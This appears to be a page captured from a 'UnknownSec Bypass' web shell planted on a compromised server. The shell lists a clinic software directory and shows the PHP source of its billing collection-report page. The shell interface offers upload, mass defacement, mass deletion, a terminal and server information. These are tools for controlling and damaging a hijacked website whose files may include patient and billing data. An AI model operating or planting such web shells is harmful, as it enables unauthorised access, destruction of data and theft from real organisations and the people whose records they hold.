UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
total_collection_report.php
<?php include "top1.php";?> <!-- /inner_content--> <div class="inner_content"> <!-- breadcrumbs --> <div class="w3l_agileits_breadcrumbs"> <div class="w3l_agileits_breadcrumbs_inner"> <ul> <li><a href="dashboard.php">Dashboard</a><span>«</span></li> <li>Total Collection Report</li> </ul> </div> </div> <!-- //breadcrumbs --> <div class="inner_content_w3_agile_info two_in"> <h2 class="w3_inner_tittle">Manage Collection Report</h2> <input type="hidden" class="form-control1" id="hduhid" name="hduhid"> <input type="hidden" class="form-control1" id="hdfileno" name="hdfileno"> <input type="hidden" class="form-control1" id="hdvoucherno" name="hdvoucherno"> <!--/forms--> <div class="forms-main_agileits"> <!--/forms-inner--> <div class="forms-inner"> <!--/set-1--> <div class="set-1_w3ls"> <div class="col-md-3 button_set_one agile_info_shadow graph-form"> <div class="form-body"> <div class="form-group"> <label for="testDepartmentyName">From Date :</label> <input type="date" class="form-control1" id="fromdate"> </div> <div class="form-group"> <label for="testDepartmentyName">To Date </label> <input type="date" class="form-control1" id="todate" placeholder="Please enter uhid..."> </div> <div class="form-group"> <label for="testDepartmentyName">Doctor </label> <select name="consultant" id="consultant" class="form-control1" style="width: 100%"> </select> </div> <div class="form-group"> <label for="testDepartmentyName">Category </label> <select name="category" id="category" class="form-control1" style="width: 100%"> </select> </div> <div class="form-group"> <label for="testDepartmentyName">Payment Mode </label> <select name="paymentmode" id="paymentmode" class="form-control1" style="width: 100%"> <option value=" "></option> <option value="CASH">CASH</option> <option value="ONLINE">ONLINE</option> <option value="MOBILE WALLET">MOBILE WALLET</option> <option value="MOBILE WALLET">CHEQUE</option> <option value="MOBILE WALLET">BANK</option> <option value="MOBILE WALLET">POS</option> </select> </div> <button id="myBtn" class="btn btn-primary" onclick="Loaddailycollection()">SHOW</button> </div> </div> <div class="col-md-9 graph-form general agile_info_shadow"> <!-- <h3 class="w3_inner_tittle two">Service List </h3> --> <div id="daynamic-data"> <!-- <table id="studtable" class="table table-striped table-bordered"> <thead> <tr> <th>Date</th> <th>File No\Vou. No.</th> <th>Uhid</th> <th>Name</th> <th>Charge Name </th> <th>Receive Amt</th> <th>Mode</th> <th>Bank</th> <th>Tran No.</th> <th></th> </tr> </thead> <tbody id="displayArea"> </tbody> </table> --> </div> </div> <div class="clearfix"> </div> </div> <!--//set-1--> </div> <!--//forms-inner--> </div> <!--//forms--> </div> </div> <?php include "footer.php";?>
Copyright © 2025 - UnknownSec